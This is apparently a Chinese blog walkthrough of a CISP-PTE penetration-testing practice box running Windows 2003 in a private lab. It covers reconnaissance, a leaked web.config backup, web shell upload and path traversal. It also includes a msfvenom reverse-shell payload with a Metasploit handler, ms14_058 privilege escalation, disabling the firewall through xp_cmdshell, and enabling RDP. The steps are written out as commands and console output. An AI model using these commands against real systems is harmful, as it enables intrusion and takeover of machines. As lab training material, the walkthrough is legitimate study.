CISP-PTE靶机

简介: 本文档详细记录了一次针对Windows 2003服务器的渗透测试过程。测试环境包括攻击机(Kali Linux,IP: 192.168.18.130)和靶机(Windows 2003,IP: 192.168.18.145),两者需处于同一局域网内。测试过程中,通过Nmap扫描发现靶机开放了SQL Server端口,进一步利用信息泄露、文件上传漏洞及数据库连接等方式,逐步获取了系统的控制权限,最终实现了远程桌面连接。文中还提供了多种技术细节和操作命令,帮助读者理解每一步的具体实现方法。

实验环境

攻击机:Kali
IP 地址:192.168.18.130
靶机:pte-win2003(windows)
IP 地址:192.168.18.145
网络:两个主机须在同一局域网下,所以虚拟机的网络配置器必须相同

一、信息收集

正常扫描nmap -sS 192.168.18.145 -T4 发现只开放了一个sql-server 随即全端口扫描

访问网站

御剑扫描完发现有爬虫协议

二、解题步骤

访问首页

看看有没有信息泄露

在网络安全和渗透测试中,Git文件泄露是一个重要的考察点,因为它可能导致敏感信息(如源代码、配置文件、密码等)的暴露。

手动检查的方法为url/.git ,这里无法访问但是提示了目标为iis

iis默认配置文件为web.config看看有没有备份文件

http://192.168.18.145:27689/web.config.bak

成功下载并访问,这里把数据库信息显示了出来

链接数据库

查询到密码

登录得到key1

发现目标存在着注入,但是我们已经连接上数据库意义不大,尝试写入一句话木马,或者oshell,尝试失败

这里选择常规的文件上传,测试奇怪后缀也被拦判断为白名单

这里想尝试文件包含图片马,然后默认aspx文件本身就是一个一句话木马,但是被误导了一直找到下载文件的接口去

192.168.18.145:27689/admin/file_down.aspx?file=638596652953750000-111111111.jpg

附:这里通过网上wp发现fuzz之后最终回溯两层目录到web根目录并下载web.config

192.168.18.145:27689/admin/file_down.aspx?file=../../web.cofig

转变思路观察到文件说明上传剪切后缀

经过测试 配合上时间戳后 文件名设置八位刚好jpg被隐藏

上传一句话木马

最后峰回路转在这里发现文件上传路径,真正的文件在这里,不应该去下载文件的,刚上传文件什么的找错了思路,在这里把那个aspx文件下载下来,并且能看到里面的密码,找到该文件的真实位置:

蚁剑连接上去自己上传的马子

成功得到key2

或者直接使用这个木马里面就是一句话木马

手工法

这里登录进来发现数据库的账号密码

查询到key.txt,得到key3

或者后渗透

msf上线

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.130 LPORT=8848 -f exe -o 1.exe

msf6 exploit(multi/hams/steamed) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf6 exploit(multi/handler) > set PORT 8848
LPORT => 8848
msf6 exploit(multi/handler) > exploit

通过剑蚁上传到靶机后,通过虚拟终端shell来运行程序

成功上线后,使用bg维持会话的同时继续执行其他模块,

bg
search ms14_058
use 0
set seesion 1
set LPORT
set LHOST
run

提权成功

解密

meterpreter > run post/windows/manage/enable_rdp

发现开启不了跟着网上的教程走一下msf版本sa提权

msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa
usname => sa
msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa
usname => sa
msf6 auxiliary(admin/mssql/mssql_exec) > set password cisp-pte@sa
password => cisp-pte@sa
msf6 auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.18.145
RHOSTS => 192.168.18.145
msf6 auxiliary(admin/mssql/mssql_exec) > set RPORT 1433
RPORT => 1433
msf6 auxiliary(admin/mssql/mssql_exec) > set CMD cmd.exe /c "netsh firewall set opmode disable"
CMD => cmd.exe /c netsh firewall set opmode disable
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.18.145
[*] 192.168.18.145:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c netsh firewall set opmode disable'

远连成功

附一个wmic法

开启3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

相关文章
|
安全 网络安全 PHP
CISP-PTE综合靶机-WinServer2008学习
CISP-PTE综合靶机-WinServer2008学习
754 0
|
3月前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
|
3月前
|
安全
偶遇鬼影病毒nat.exe
偶遇鬼影病毒nat.exe
|
7月前
|
域名解析 监控 网络协议
Linux网卡与IP地址:通往网络世界的通行证 🌐
探索Linux网卡与IP地址关系,理解网卡作为网络通信的关键。Linux网卡需配置IP地址以实现唯一标识、通信、路由、安全管理和网络服务。无IP地址时,网卡在特定情况如局域网服务、网络监控、无线认证和网络启动可有限工作,但通用功能受限。配置IP地址通常通过`ifconfig`(传统)或`ip`(现代)命令,永久配置需编辑网络配置文件。配置错误如IP冲突、子网掩码错误、默认网关和DNS配置不当可能导致服务中断、网络拥堵、安全漏洞和数据丢失。重视网络配置的正确与安全至关重要。
Linux网卡与IP地址:通往网络世界的通行证 🌐
|
前端开发 Docker 容器
基于xinetd部署pwn题(百分百搭成并且可以nc靶场地址)
基于xinetd部署pwn题(百分百搭成并且可以nc靶场地址)
293 1
|
SQL Shell 网络安全
CISP-PTE综合靶机-WinServer2003学习
CISP-PTE综合靶机-WinServer2003学习
1560 0
|
安全 Oracle Java
记一次对Hackmyvm-Area51靶机的渗透测试
记一次对Hackmyvm-Area51靶机的渗透测试
102 0
记一次对Hackmyvm-Area51靶机的渗透测试
|
安全 IDE Linux
【墨菲安全实验室】“Dirty Pipe”的故事-Linux 内核提权漏洞
【墨菲安全实验室】“Dirty Pipe”的故事-Linux 内核提权漏洞
【墨菲安全实验室】“Dirty Pipe”的故事-Linux 内核提权漏洞
|
Shell 数据安全/隐私保护
【CTF】靶机:DC-4
本次靶机的知识与前几个靶机略有重叠,不过在信息收集方面有一些难度,值得初学者进行学习。
136 0
|
安全 Shell 网络安全
【CTF】靶机:DC-2
本靶机适合初学者进行练习,适合已经了解渗透流程,有整体思路的初学者进行学习。 本文将从头讲解,并配有视频教程。
181 0